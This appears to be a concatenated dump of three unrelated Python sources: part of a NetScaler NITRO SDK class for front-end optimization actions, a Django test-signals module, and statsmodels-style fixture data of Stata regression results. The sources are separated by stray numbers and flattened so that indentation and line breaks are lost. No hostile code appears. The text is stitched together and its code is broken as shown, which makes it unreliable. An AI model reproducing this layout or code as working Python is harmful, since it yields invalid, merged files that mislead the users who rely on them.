""" try : return self._imglazyload except Exception as e: raise e @imglazyload.setter def imglazyload(self, imglazyload) : """Download images, only when the user scrolls the page to view them. """ try : self._imglazyload = imglazyload except Exception as e: raise e @property def cssminify(self) : """Remove comments and whitespaces from CSSs. """ try : return self._cssminify except Exception as e: raise e @cssminify.setter def cssminify(self, cssminify) : """Remove comments and whitespaces from CSSs. """ try : self._cssminify = cssminify except Exception as e: raise e @property def cssinline(self) : """Inline CSS files, whose size is less than 2KB, within the main page. """ try : return self._cssinline except Exception as e: raise e @cssinline.setter def cssinline(self, cssinline) : """Inline CSS files, whose size is less than 2KB, within the main page. """ try : self._cssinline = cssinline except Exception as e: raise e @property def csscombine(self) : """Combine one or more CSS files into one file. """ try : return self._csscombine except Exception as e: raise e @csscombine.setter def csscombine(self, csscombine) : """Combine one or more CSS files into one file. """ try : self._csscombine = csscombine except Exception as e: raise e @property def convertimporttolink(self) : """Convert CSS import statements to HTML link tags. """ try : return self._convertimporttolink except Exception as e: raise e @convertimporttolink.setter def convertimporttolink(self, convertimporttolink) : """Convert CSS import statements to HTML link tags. """ try : self._convertimporttolink = convertimporttolink except Exception as e: raise e @property def jsminify(self) : """Remove comments and whitespaces from JavaScript. """ try : return self._jsminify except Exception as e: raise e @jsminify.setter def jsminify(self, jsminify) : """Remove comments and whitespaces from JavaScript. 
""" try : self._jsminify = jsminify except Exception as e: raise e @property def jsinline(self) : """Convert linked JavaScript files (less than 2KB) to inline JavaScript files. """ try : return self._jsinline except Exception as e: raise e @jsinline.setter def jsinline(self, jsinline) : """Convert linked JavaScript files (less than 2KB) to inline JavaScript files. """ try : self._jsinline = jsinline except Exception as e: raise e @property def htmlminify(self) : """Remove comments and whitespaces from an HTML page. """ try : return self._htmlminify except Exception as e: raise e @htmlminify.setter def htmlminify(self, htmlminify) : """Remove comments and whitespaces from an HTML page. """ try : self._htmlminify = htmlminify except Exception as e: raise e @property def cssmovetohead(self) : """Move any CSS file present within the body tag of an HTML page to the head tag. """ try : return self._cssmovetohead except Exception as e: raise e @cssmovetohead.setter def cssmovetohead(self, cssmovetohead) : """Move any CSS file present within the body tag of an HTML page to the head tag. """ try : self._cssmovetohead = cssmovetohead except Exception as e: raise e @property def jsmovetoend(self) : """Move any JavaScript present in the body tag to the end of the body tag. """ try : return self._jsmovetoend except Exception as e: raise e @jsmovetoend.setter def jsmovetoend(self, jsmovetoend) : """Move any JavaScript present in the body tag to the end of the body tag. """ try : self._jsmovetoend = jsmovetoend except Exception as e: raise e @property def domainsharding(self) : """Domain name of the server. """ try : return self._domainsharding except Exception as e: raise e @domainsharding.setter def domainsharding(self, domainsharding) : """Domain name of the server. """ try : self._domainsharding = domainsharding except Exception as e: raise e @property def dnsshards(self) : """Set of domain names that replaces the parent domain. 
""" try : return self._dnsshards except Exception as e: raise e @dnsshards.setter def dnsshards(self, dnsshards) : """Set of domain names that replaces the parent domain. """ try : self._dnsshards = dnsshards except Exception as e: raise e @property def clientsidemeasurements(self) : """Collect the amount of time required for the client to load and render the web page. """ try : return self._clientsidemeasurements except Exception as e: raise e @clientsidemeasurements.setter def clientsidemeasurements(self, clientsidemeasurements) : """Collect the amount of time required for the client to load and render the web page. """ try : self._clientsidemeasurements = clientsidemeasurements except Exception as e: raise e @property def imgadddimensions(self) : """Add dimension attributes to images, if not specified within the <img> tag. """ try : return self._imgadddimensions except Exception as e: raise e @property def imgshrinkformobile(self) : """Serve smaller images for mobile users. """ try : return self._imgshrinkformobile except Exception as e: raise e @property def imgweaken(self) : """Reduce the image quality. """ try : return self._imgweaken except Exception as e: raise e @property def jpgprogressive(self) : """Convert JPEG image formats to progressive formats. """ try : return self._jpgprogressive except Exception as e: raise e @property def cssflattenimports(self) : """Replace CSS import statements with the file content. """ try : return self._cssflattenimports except Exception as e: raise e @property def jscombine(self) : """Combine one or more JavaScript files into one file. """ try : return self._jscombine except Exception as e: raise e @property def htmlrmdefaultattribs(self) : """Remove default redundant attributes from an HTML file. """ try : return self._htmlrmdefaultattribs except Exception as e: raise e @property def htmlrmattribquotes(self) : """Remove unnecessary quotes present within the HTML attributes. 
""" try : return self._htmlrmattribquotes except Exception as e: raise e @property def htmltrimurls(self) : """Trim URLs. """ try : return self._htmltrimurls except Exception as e: raise e @property def hits(self) : """The number of times the action has been taken. """ try : return self._hits except Exception as e: raise e @property def undefhits(self) : """Total number of undefined policy hits. """ try : return self._undefhits except Exception as e: raise e @property def builtin(self) : """Flag to determine if front end optimization action is built-in or not.<br/>Possible values = MODIFIABLE, DELETABLE, IMMUTABLE, PARTITION_ALL. """ try : return self._builtin except Exception as e: raise e def _get_nitro_response(self, service, response) : """ converts nitro response into object and returns the object array in case of get request. """ try : result = service.payload_formatter.string_to_resource(feoaction_response, response, self.__class__.__name__) if(result.errorcode != 0) : if (result.errorcode == 444) : service.clear_session(self) if result.severity : if (result.severity == "ERROR") : raise nitro_exception(result.errorcode, str(result.message), str(result.severity)) else : raise nitro_exception(result.errorcode, str(result.message), str(result.severity)) return result.feoaction except Exception as e : raise e def _get_object_name(self) : """ Returns the value of object identifier argument """ try : if (self.name) : return str(self.name) return None except Exception as e : raise e @classmethod def add(cls, client, resource) : """ Use this API to add feoaction. 
""" try : if type(resource) is not list : addresource = feoaction() addresource.name = resource.name addresource.pageextendcache = resource.pageextendcache addresource.imgshrinktoattrib = resource.imgshrinktoattrib addresource.imggiftopng = resource.imggiftopng addresource.imginline = resource.imginline addresource.cssimginline = resource.cssimginline addresource.jpgoptimize = resource.jpgoptimize addresource.imglazyload = resource.imglazyload addresource.cssminify = resource.cssminify addresource.cssinline = resource.cssinline addresource.csscombine = resource.csscombine addresource.convertimporttolink = resource.convertimporttolink addresource.jsminify = resource.jsminify addresource.jsinline = resource.jsinline addresource.htmlminify = resource.htmlminify addresource.cssmovetohead = resource.cssmovetohead addresource.jsmovetoend = resource.jsmovetoend addresource.domainsharding = resource.domainsharding addresource.dnsshards = resource.dnsshards addresource.clientsidemeasurements = resource.clientsidemeasurements return addresource.add_resource(client) else : if (resource and len(resource) > 0) : addresources = [ feoaction() for _ in range(len(resource))] for i in range(len(resource)) : addresources[i].name = resource[i].name addresources[i].pageextendcache = resource[i].pageextendcache addresources[i].imgshrinktoattrib = resource[i].imgshrinktoattrib addresources[i].imggiftopng = resource[i].imggiftopng addresources[i].imginline = resource[i].imginline addresources[i].cssimginline = resource[i].cssimginline addresources[i].jpgoptimize = resource[i].jpgoptimize addresources[i].imglazyload = resource[i].imglazyload addresources[i].cssminify = resource[i].cssminify addresources[i].cssinline = resource[i].cssinline addresources[i].csscombine = resource[i].csscombine addresources[i].convertimporttolink = resource[i].convertimporttolink addresources[i].jsminify = resource[i].jsminify addresources[i].jsinline = resource[i].jsinline addresources[i].htmlminify = 
resource[i].htmlminify addresources[i].cssmovetohead = resource[i].cssmovetohead addresources[i].jsmovetoend = resource[i].jsmovetoend addresources[i].domainsharding = resource[i].domainsharding addresources[i].dnsshards = resource[i].dnsshards addresources[i].clientsidemeasurements = resource[i].clientsidemeasurements result = cls.add_bulk_request(client, addresources) return result except Exception as e : raise e @classmethod def update(cls, client, resource) : """ Use this API to update feoaction. """ try : if type(resource) is not list : updateresource = feoaction() updateresource.name = resource.name updateresource.pageextendcache = resource.pageextendcache updateresource.imgshrinktoattrib = resource.imgshrinktoattrib updateresource.imggiftopng = resource.imggiftopng updateresource.imginline = resource.imginline updateresource.cssimginline = resource.cssimginline updateresource.jpgoptimize = resource.jpgoptimize updateresource.imglazyload = resource.imglazyload updateresource.cssminify = resource.cssminify updateresource.cssinline = resource.cssinline updateresource.csscombine = resource.csscombine updateresource.convertimporttolink = resource.convertimporttolink updateresource.jsminify = resource.jsminify updateresource.jsinline = resource.jsinline updateresource.htmlminify = resource.htmlminify updateresource.cssmovetohead = resource.cssmovetohead updateresource.jsmovetoend = resource.jsmovetoend updateresource.domainsharding = resource.domainsharding updateresource.dnsshards = resource.dnsshards updateresource.clientsidemeasurements = resource.clientsidemeasurements return updateresource.update_resource(client) else : if (resource and len(resource) > 0) : updateresources = [ feoaction() for _ in range(len(resource))] for i in range(len(resource)) : updateresources[i].name = resource[i].name updateresources[i].pageextendcache = resource[i].pageextendcache updateresources[i].imgshrinktoattrib = resource[i].imgshrinktoattrib updateresources[i].imggiftopng = 
resource[i].imggiftopng updateresources[i].imginline = resource[i].imginline updateresources[i].cssimginline = resource[i].cssimginline updateresources[i].jpgoptimize = resource[i].jpgoptimize updateresources[i].imglazyload = resource[i].imglazyload updateresources[i].cssminify = resource[i].cssminify updateresources[i].cssinline = resource[i].cssinline updateresources[i].csscombine = resource[i].csscombine updateresources[i].convertimporttolink = resource[i].convertimporttolink updateresources[i].jsminify = resource[i].jsminify updateresources[i].jsinline = resource[i].jsinline updateresources[i].htmlminify = resource[i].htmlminify updateresources[i].cssmovetohead = resource[i].cssmovetohead updateresources[i].jsmovetoend = resource[i].jsmovetoend updateresources[i].domainsharding = resource[i].domainsharding updateresources[i].dnsshards = resource[i].dnsshards updateresources[i].clientsidemeasurements = resource[i].clientsidemeasurements result = cls.update_bulk_request(client, updateresources) return result except Exception as e : raise e @classmethod def unset(cls, client, resource, args) : """ Use this API to unset the properties of feoaction resource. Properties that need to be unset are specified in args array. 
""" try : if type(resource) is not list : unsetresource = feoaction() if type(resource) != type(unsetresource): unsetresource.name = resource else : unsetresource.name = resource.name return unsetresource.unset_resource(client, args) else : if type(resource[0]) != cls : if (resource and len(resource) > 0) : unsetresources = [ feoaction() for _ in range(len(resource))] for i in range(len(resource)) : unsetresources[i].name = resource[i] else : if (resource and len(resource) > 0) : unsetresources = [ feoaction() for _ in range(len(resource))] for i in range(len(resource)) : unsetresources[i].name = resource[i].name result = cls.unset_bulk_request(client, unsetresources, args) return result except Exception as e : raise e @classmethod def delete(cls, client, resource) : """ Use this API to delete feoaction. """ try : if type(resource) is not list : deleteresource = feoaction() if type(resource) != type(deleteresource): deleteresource.name = resource else : deleteresource.name = resource.name return deleteresource.delete_resource(client) else : if type(resource[0]) != cls : if (resource and len(resource) > 0) : deleteresources = [ feoaction() for _ in range(len(resource))] for i in range(len(resource)) : deleteresources[i].name = resource[i] else : if (resource and len(resource) > 0) : deleteresources = [ feoaction() for _ in range(len(resource))] for i in range(len(resource)) : deleteresources[i].name = resource[i].name result = cls.delete_bulk_request(client, deleteresources) return result except Exception as e : raise e @classmethod def get(cls, client, name="", option_="") : """ Use this API to fetch all the feoaction resources that are configured on netscaler. 
""" try : if not name : obj = feoaction() response = obj.get_resources(client, option_) else : if type(name) != cls : if type(name) is not list : obj = feoaction() obj.name = name response = obj.get_resource(client, option_) else : if name and len(name) > 0 : response = [feoaction() for _ in range(len(name))] obj = [feoaction() for _ in range(len(name))] for i in range(len(name)) : obj[i] = feoaction() obj[i].name = name[i] response[i] = obj[i].get_resource(client, option_) return response except Exception as e : raise e @classmethod def get_filtered(cls, client, filter_) : """ Use this API to fetch filtered set of feoaction resources. filter string should be in JSON format.eg: "port:80,servicetype:HTTP". """ try : obj = feoaction() option_ = options() option_.filter = filter_ response = obj.getfiltered(client, option_) return response except Exception as e : raise e @classmethod def count(cls, client) : """ Use this API to count the feoaction resources configured on NetScaler. """ try : obj = feoaction() option_ = options() option_.count = True response = obj.get_resources(client, option_) if response : return response[0].__dict__['___count'] return 0 except Exception as e : raise e @classmethod def count_filtered(cls, client, filter_) : """ Use this API to count filtered the set of feoaction resources. Filter string should be in JSON format.eg: "port:80,servicetype:HTTP". """ try : obj = feoaction() option_ = options() option_.count = True option_.filter = filter_ response = obj.getfiltered(client, option_) if response : return response[0].__dict__['___count'] return 0 except Exception as e : raise e class Builtin: MODIFIABLE = "MODIFIABLE" DELETABLE = "DELETABLE" IMMUTABLE = "IMMUTABLE" PARTITION_ALL = "PARTITION_ALL" class feoaction_response(base_response) : def __init__(self, length=1) : self.feoaction = [] self.errorcode = 0 self.message = "" self.severity = "" self.sessionid = "" self.feoaction = [feoaction() for _ in range(length)]
0.040919
import os import time import threading import warnings from django.conf import settings from django.db import connections from django.dispatch import receiver, Signal from django.utils import timezone from django.utils.functional import empty template_rendered = Signal(providing_args=["template", "context"]) setting_changed = Signal(providing_args=["setting", "value", "enter"]) # Most setting_changed receivers are supposed to be added below, # except for cases where the receiver is related to a contrib app. # Settings that may not work well when using 'override_settings' (#19031) COMPLEX_OVERRIDE_SETTINGS = {'DATABASES'} @receiver(setting_changed) def clear_cache_handlers(**kwargs): if kwargs['setting'] == 'CACHES': from django.core.cache import caches caches._caches = threading.local() @receiver(setting_changed) def update_installed_apps(**kwargs): if kwargs['setting'] == 'INSTALLED_APPS': # Rebuild any AppDirectoriesFinder instance. from django.contrib.staticfiles.finders import get_finder get_finder.cache_clear() # Rebuild management commands cache from django.core.management import get_commands get_commands.cache_clear() # Rebuild templatetags module cache. from django.template import base as mod mod.templatetags_modules = [] # Rebuild get_app_template_dirs cache. from django.template.utils import get_app_template_dirs get_app_template_dirs.cache_clear() # Rebuild translations cache. 
from django.utils.translation import trans_real trans_real._translations = {} @receiver(setting_changed) def update_connections_time_zone(**kwargs): if kwargs['setting'] == 'TIME_ZONE': # Reset process time zone if hasattr(time, 'tzset'): if kwargs['value']: os.environ['TZ'] = kwargs['value'] else: os.environ.pop('TZ', None) time.tzset() # Reset local time zone cache timezone._localtime = None # Reset the database connections' time zone if kwargs['setting'] == 'USE_TZ' and settings.TIME_ZONE != 'UTC': USE_TZ, TIME_ZONE = kwargs['value'], settings.TIME_ZONE elif kwargs['setting'] == 'TIME_ZONE' and not settings.USE_TZ: USE_TZ, TIME_ZONE = settings.USE_TZ, kwargs['value'] else: # no need to change the database connnections' time zones return tz = 'UTC' if USE_TZ else TIME_ZONE for conn in connections.all(): conn.settings_dict['TIME_ZONE'] = tz tz_sql = conn.ops.set_time_zone_sql() if tz_sql: conn.cursor().execute(tz_sql, [tz]) @receiver(setting_changed) def clear_context_processors_cache(**kwargs): if kwargs['setting'] == 'TEMPLATE_CONTEXT_PROCESSORS': from django.template import context context._standard_context_processors = None @receiver(setting_changed) def clear_template_loaders_cache(**kwargs): if kwargs['setting'] == 'TEMPLATE_LOADERS': from django.template.loaders.utils import get_template_loaders get_template_loaders.cache_clear() @receiver(setting_changed) def clear_serializers_cache(**kwargs): if kwargs['setting'] == 'SERIALIZATION_MODULES': from django.core import serializers serializers._serializers = {} @receiver(setting_changed) def language_changed(**kwargs): if kwargs['setting'] in {'LANGUAGES', 'LANGUAGE_CODE', 'LOCALE_PATHS'}: from django.utils.translation import trans_real trans_real._default = None trans_real._active = threading.local() if kwargs['setting'] in {'LANGUAGES', 'LOCALE_PATHS'}: from django.utils.translation import trans_real trans_real._translations = {} trans_real.check_for_language.cache_clear() @receiver(setting_changed) def 
file_storage_changed(**kwargs): file_storage_settings = { 'DEFAULT_FILE_STORAGE', 'FILE_UPLOAD_DIRECTORY_PERMISSIONS', 'FILE_UPLOAD_PERMISSIONS', 'MEDIA_ROOT', 'MEDIA_URL', } if kwargs['setting'] in file_storage_settings: from django.core.files.storage import default_storage default_storage._wrapped = empty @receiver(setting_changed) def complex_setting_changed(**kwargs): if kwargs['enter'] and kwargs['setting'] in COMPLEX_OVERRIDE_SETTINGS: # Considering the current implementation of the signals framework, # stacklevel=5 shows the line containing the override_settings call. warnings.warn("Overriding setting %s can lead to unexpected behavior." % kwargs['setting'], stacklevel=5) @receiver(setting_changed) def root_urlconf_changed(**kwargs): if kwargs['setting'] == 'ROOT_URLCONF': from django.core.urlresolvers import clear_url_caches, set_urlconf clear_url_caches() set_urlconf(None)
0
import numpy as np class Bunch(dict): def __init__(self, **kw): dict.__init__(self, kw) self.__dict__ = self for i,att in enumerate(['params', 'bse', 'tvalues', 'pvalues']): self[att] = self.params_table[:,i] est = dict( N_clust = 10, N = 200, df_m = 2, df_r = 9, F = 51.59060716590177, r2 = .8124080178314147, rmse = 94.40840193979599, mss = 7604093.484267689, rss = 1755850.432294737, r2_a = .8105035307027997, ll = -1191.80235741801, ll_0 = -1359.150955647688, rank = 3, cmdline = "regress invest mvalue kstock, vce(cluster company)", title = "Linear regression", marginsok = "XB default", vce = "cluster", depvar = "invest", cmd = "regress", properties = "b V", predict = "regres_p", model = "ols", estat_cmd = "regress_estat", vcetype = "Robust", clustvar = "company", ) params_table = np.array([ .11556215606596, .01589433647768, 7.2706499090564, .00004710548549, .07960666895505, .15151764317688, 9, 2.2621571627982, 0, .23067848754982, .08496711097464, 2.7149150406994, .02380515903536, .03846952885627, .42288744624337, 9, 2.2621571627982, 0, -42.714369016733, 20.425202580078, -2.0912580352272, .06604843284516, -88.919387334862, 3.4906493013959, 9, 2.2621571627982, 0]).reshape(3,9) params_table_colnames = 'b se t pvalue ll ul df crit eform'.split() params_table_rownames = 'mvalue kstock _cons'.split() cov = np.array([ .00025262993207, -.00065043385106, .20961897960949, -.00065043385106, .00721940994738, -1.2171040967615, .20961897960949, -1.2171040967615, 417.18890043724]).reshape(3,3) cov_colnames = 'mvalue kstock _cons'.split() cov_rownames = 'mvalue kstock _cons'.split() results_cluster = Bunch( params_table=params_table, params_table_colnames=params_table_colnames, params_table_rownames=params_table_rownames, cov=cov, cov_colnames=cov_colnames, cov_rownames=cov_rownames, **est ) est = dict( N = 200, inexog_ct = 2, exexog_ct = 0, endog_ct = 0, partial_ct = 0, N_clust = 10, df_m = 2, sdofminus = 0, dofminus = 0, r2 = .8124080178314146, rmse = 93.69766358599176, rss = 
1755850.432294737, mss = 7604093.484267682, r2_a = .8105035307027995, F = 51.59060716590192, Fp = .0000117341240941, Fdf1 = 2, Fdf2 = 9, yy = 13620706.07273678, yyc = 9359943.916562419, partialcons = 0, cons = 1, jdf = 0, j = 0, ll = -1191.802357418011, rankV = 3, rankS = 3, rankxx = 3, rankzz = 3, r2c = .8124080178314146, r2u = .8710896173136538, clustvar = "company", hacsubtitleV = "Statistics robust to heteroskedasticity and clustering on company", hacsubtitleB = "Estimates efficient for homoskedasticity only", title = "OLS estimation", predict = "ivreg2_p", version = "03.1.07", cmdline = "ivreg2 invest mvalue kstock, cluster(company)", cmd = "ivreg2", model = "ols", depvar = "invest", vcetype = "Robust", vce = "robust cluster", partialsmall = "small", inexog = "mvalue kstock", insts = "mvalue kstock", properties = "b V", ) params_table = np.array([ .11556215606596, .01500272788516, 7.7027429245215, 1.331761148e-14, .08615734974119, .14496696239074, np.nan, 1.9599639845401, 0, .23067848754982, .08020079648691, 2.8762618035529, .00402415789383, .07348781490405, .38786916019559, np.nan, 1.9599639845401, 0, -42.714369016733, 19.27943055305, -2.2155410088072, .02672295281194, -80.501358543152, -4.9273794903145, np.nan, 1.9599639845401, 0]).reshape(3,9) params_table_colnames = 'b se z pvalue ll ul df crit eform'.split() params_table_rownames = 'mvalue kstock _cons'.split() cov = np.array([ .000225081844, -.00057950714469, .1867610305767, -.00057950714469, .00643216775713, -1.0843847053056, .1867610305767, -1.0843847053056, 371.69644244987]).reshape(3,3) cov_colnames = 'mvalue kstock _cons'.split() cov_rownames = 'mvalue kstock _cons'.split() results_cluster_large = Bunch( params_table=params_table, params_table_colnames=params_table_colnames, params_table_rownames=params_table_rownames, cov=cov, cov_colnames=cov_colnames, cov_rownames=cov_rownames, **est ) est = dict( N = 200, N_g = 10, df_m = 2, df_r = 9, F = 97.97910905239282, r2 = .8124080178314147, rmse = 
94.40840193979599, lag = 4, cmd = "xtscc", predict = "xtscc_p", method = "Pooled OLS", depvar = "invest", vcetype = "Drisc/Kraay", title = "Regression with Driscoll-Kraay standard errors", groupvar = "company", properties = "b V", ) params_table = np.array([ .11556215606596, .0134360177573, 8.6009231420662, .00001235433261, .08516777225681, .14595653987512, 9, 2.2621571627982, 0, .23067848754982, .04930800664089, 4.678317037431, .00115494570515, .11913602714384, .3422209479558, 9, 2.2621571627982, 0, -42.714369016733, 12.190347184209, -3.5039501641153, .0066818746948, -70.290850216489, -15.137887816977, 9, 2.2621571627982, 0]).reshape(3,9) params_table_colnames = 'b se t pvalue ll ul df crit eform'.split() params_table_rownames = 'mvalue kstock _cons'.split() cov = np.array([ .00018052657317, -.00035661054613, -.06728261073866, -.00035661054613, .0024312795189, -.32394785247278, -.06728261073866, -.32394785247278, 148.60456447156]).reshape(3,3) cov_colnames = 'mvalue kstock _cons'.split() cov_rownames = 'mvalue kstock _cons'.split() results_nw_groupsum4 = Bunch( params_table=params_table, params_table_colnames=params_table_colnames, params_table_rownames=params_table_rownames, cov=cov, cov_colnames=cov_colnames, cov_rownames=cov_rownames, **est ) est = dict( df_m = 2, df_r = 197, F = 73.07593045506036, N = 200, lag = 4, rank = 3, title = "Regression with Newey-West standard errors", cmd = "newey", cmdline = "newey invest mvalue kstock, lag(4) force", estat_cmd = "newey_estat", predict = "newey_p", vcetype = "Newey-West", depvar = "invest", properties = "b V", ) params_table = np.array([ .11556215606596, .01142785251475, 10.112324771147, 1.251631065e-19, .0930255277205, .13809878441142, 197, 1.9720790337785, 0, .23067848754982, .06842168281423, 3.3714237660029, .00089998163666, .09574552141602, .36561145368361, 197, 1.9720790337785, 0, -42.714369016733, 16.179042041128, -2.6401049523298, .00895205094219, -74.620718612662, -10.808019420804, 197, 1.9720790337785, 
0]).reshape(3,9) params_table_colnames = 'b se t pvalue ll ul df crit eform'.split() params_table_rownames = 'mvalue kstock _cons'.split() cov = np.array([ .0001305958131, -.00022910455176, .00889686530849, -.00022910455176, .00468152667913, -.88403667445531, .00889686530849, -.88403667445531, 261.76140136858]).reshape(3,3) cov_colnames = 'mvalue kstock _cons'.split() cov_rownames = 'mvalue kstock _cons'.split() results_nw_panel4 = Bunch( params_table=params_table, params_table_colnames=params_table_colnames, params_table_rownames=params_table_rownames, cov=cov, cov_colnames=cov_colnames, cov_rownames=cov_rownames, **est ) est = dict( N = 200, inexog_ct = 2, exexog_ct = 0, endog_ct = 0, partial_ct = 0, df_r = 9, N_clust = 10, N_clust1 = 10, N_clust2 = 20, df_m = 2, sdofminus = 0, dofminus = 0, r2 = .8124080178314146, rmse = 94.40840193979601, rss = 1755850.432294737, mss = 7604093.484267682, r2_a = .8105035307027995, F = 57.99124535923564, Fp = 7.21555935862e-06, Fdf1 = 2, partialcons = 0, cons = 1, jdf = 0, j = 0, ll = -1191.802357418011, rankV = 3, rankS = 3, rankxx = 3, rankzz = 3, r2c = .8124080178314146, r2u = .8710896173136538, yyc = 9359943.916562419, yy = 13620706.07273678, Fdf2 = 9, clustvar = "company time", hacsubtitleV = "Statistics robust to heteroskedasticity and clustering on company and time", hacsubtitleB = "Estimates efficient for homoskedasticity only", title = "OLS estimation", predict = "ivreg2_p", version = "03.1.07", cmdline = "ivreg2 invest mvalue kstock, cluster(company time) small", cmd = "ivreg2", model = "ols", depvar = "invest", vcetype = "Robust", clustvar2 = "time", clustvar1 = "company", vce = "robust two-way cluster", partialsmall = "small", small = "small", inexog = "mvalue kstock", insts = "mvalue kstock", properties = "b V", ) params_table = np.array([ .11556215606596, .01635175387097, 7.0672636695645, .00005873628221, .07857191892244, .15255239320949, 9, 2.2621571627982, 0, .23067848754982, .07847391274682, 2.9395563375824, 
.01649863150032, .05315816373679, .40819881136285, 9, 2.2621571627982, 0, -42.714369016733, 19.505607409785, -2.189850750062, .05626393734425, -86.839118533508, 1.4103805000422, 9, 2.2621571627982, 0]).reshape(3,9) params_table_colnames = 'b se t pvalue ll ul df crit eform'.split() params_table_rownames = 'mvalue kstock _cons'.split() cov = np.array([ .00026737985466, -.00070163493529, .19641438763743, -.00070163493529, .0061581549818, -.99627581152391, .19641438763743, -.99627581152391, 380.46872042467]).reshape(3,3) cov_colnames = 'mvalue kstock _cons'.split() cov_rownames = 'mvalue kstock _cons'.split() results_cluster_2groups_small = Bunch( params_table=params_table, params_table_colnames=params_table_colnames, params_table_rownames=params_table_rownames, cov=cov, cov_colnames=cov_colnames, cov_rownames=cov_rownames, **est ) est = dict( N = 200, inexog_ct = 2, exexog_ct = 0, endog_ct = 0, partial_ct = 0, N_clust = 10, N_clust1 = 10, N_clust2 = 20, df_m = 2, sdofminus = 0, dofminus = 0, r2 = .8124080178314146, rmse = 93.69766358599176, rss = 1755850.432294737, mss = 7604093.484267682, r2_a = .8105035307027995, F = 57.99124535923565, Fp = 7.21555935862e-06, Fdf1 = 2, Fdf2 = 9, partialcons = 0, cons = 1, jdf = 0, j = 0, ll = -1191.802357418011, rankV = 3, rankS = 3, rankxx = 3, rankzz = 3, r2c = .8124080178314146, r2u = .8710896173136538, yyc = 9359943.916562419, yy = 13620706.07273678, clustvar = "company time", hacsubtitleV = "Statistics robust to heteroskedasticity and clustering on company and time", hacsubtitleB = "Estimates efficient for homoskedasticity only", title = "OLS estimation", predict = "ivreg2_p", version = "03.1.07", cmdline = "ivreg2 invest mvalue kstock, cluster(company time)", cmd = "ivreg2", model = "ols", depvar = "invest", vcetype = "Robust", clustvar2 = "time", clustvar1 = "company", vce = "robust two-way cluster", partialsmall = "small", inexog = "mvalue kstock", insts = "mvalue kstock", properties = "b V", ) params_table = np.array([ 
.11556215606596, .01543448599542, 7.487269488613, 7.032121917e-14, .08531111939505, .14581319273688, np.nan, 1.9599639845401, 0, .23067848754982, .07407184066336, 3.1142534799181, .00184410987255, .08550034758104, .3758566275186, np.nan, 1.9599639845401, 0, -42.714369016733, 18.411420987265, -2.319993065515, .02034125246974, -78.800091055978, -6.6286469774879, np.nan, 1.9599639845401, 0]).reshape(3,9) params_table_colnames = 'b se z pvalue ll ul df crit eform'.split() params_table_rownames = 'mvalue kstock _cons'.split() cov = np.array([ .00023822335794, -.00062512499511, .17499633632219, -.00062512499511, .00548663757926, -.88763669036779, .17499633632219, -.88763669036779, 338.98042277032]).reshape(3,3) cov_colnames = 'mvalue kstock _cons'.split() cov_rownames = 'mvalue kstock _cons'.split() results_cluster_2groups_large = Bunch( params_table=params_table, params_table_colnames=params_table_colnames, params_table_rownames=params_table_rownames, cov=cov, cov_colnames=cov_colnames, cov_rownames=cov_rownames, **est ) est = dict( N = 200, inexog_ct = 2, exexog_ct = 0, endog_ct = 0, partial_ct = 0, bw = 5, N_clust = 20, df_m = 2, sdofminus = 0, dofminus = 0, r2 = .8124080178314146, rmse = 93.69766358599176, rss = 1755850.432294737, mss = 7604093.484267682, r2_a = .8105035307027995, F = 92.14467466912147, Fp = 1.66368179227e-10, Fdf1 = 2, Fdf2 = 19, yy = 13620706.07273678, partialcons = 0, cons = 1, jdf = 0, j = 0, ll = -1191.802357418011, rankV = 3, rankS = 3, rankxx = 3, rankzz = 3, r2c = .8124080178314146, r2u = .8710896173136538, yyc = 9359943.916562419, clustvar = "year", hacsubtitleV2 = "and kernel-robust to common correlated disturbances (Driscoll-Kraay)", hacsubtitleV = "Statistics robust to heteroskedasticity and clustering on year", hacsubtitleB = "Estimates efficient for homoskedasticity only", title = "OLS estimation", predict = "ivreg2_p", version = "03.1.07", cmdline = "ivreg2 invest mvalue kstock, dkraay(5)", cmd = "ivreg2", model = "ols", depvar = 
"invest", vcetype = "Robust", vce = "cluster ac bartlett bw=5", partialsmall = "small", ivar = "company", tvar = "year", kernel = "Bartlett", inexog = "mvalue kstock", insts = "mvalue kstock", properties = "b V", ) params_table = np.array([ .11556215606596, .0134360177573, 8.6009231420662, 7.907743030e-18, .08922804516602, .14189626696591, np.nan, 1.9599639845401, 0, .23067848754982, .04930800664089, 4.678317037431, 2.892390940e-06, .13403657038422, .32732040471542, np.nan, 1.9599639845401, 0, -42.714369016733, 12.190347184209, -3.5039501641153, .00045841113727, -66.607010456823, -18.821727576643, np.nan, 1.9599639845401, 0]).reshape(3,9) params_table_colnames = 'b se z pvalue ll ul df crit eform'.split() params_table_rownames = 'mvalue kstock _cons'.split() cov = np.array([ .00018052657317, -.00035661054613, -.06728261073866, -.00035661054613, .0024312795189, -.32394785247278, -.06728261073866, -.32394785247278, 148.60456447156]).reshape(3,3) cov_colnames = 'mvalue kstock _cons'.split() cov_rownames = 'mvalue kstock _cons'.split() results_nw_groupsum4_ivreg_large = Bunch( params_table=params_table, params_table_colnames=params_table_colnames, params_table_rownames=params_table_rownames, cov=cov, cov_colnames=cov_colnames, cov_rownames=cov_rownames, **est ) est = dict( N = 200, inexog_ct = 2, exexog_ct = 0, endog_ct = 0, partial_ct = 0, bw = 5, df_r = 19, N_clust = 20, df_m = 2, sdofminus = 0, dofminus = 0, r2 = .8124080178314146, rmse = 94.40840193979601, rss = 1755850.432294737, mss = 7604093.484267682, r2_a = .8105035307027995, F = 92.14467466912149, Fp = 1.66368179227e-10, Fdf1 = 2, Fdf2 = 19, partialcons = 0, cons = 1, jdf = 0, j = 0, ll = -1191.802357418011, rankV = 3, rankS = 3, rankxx = 3, rankzz = 3, r2c = .8124080178314146, r2u = .8710896173136538, yyc = 9359943.916562419, yy = 13620706.07273678, clustvar = "year", hacsubtitleV2 = "and kernel-robust to common correlated disturbances (Driscoll-Kraay)", hacsubtitleV = "Statistics robust to 
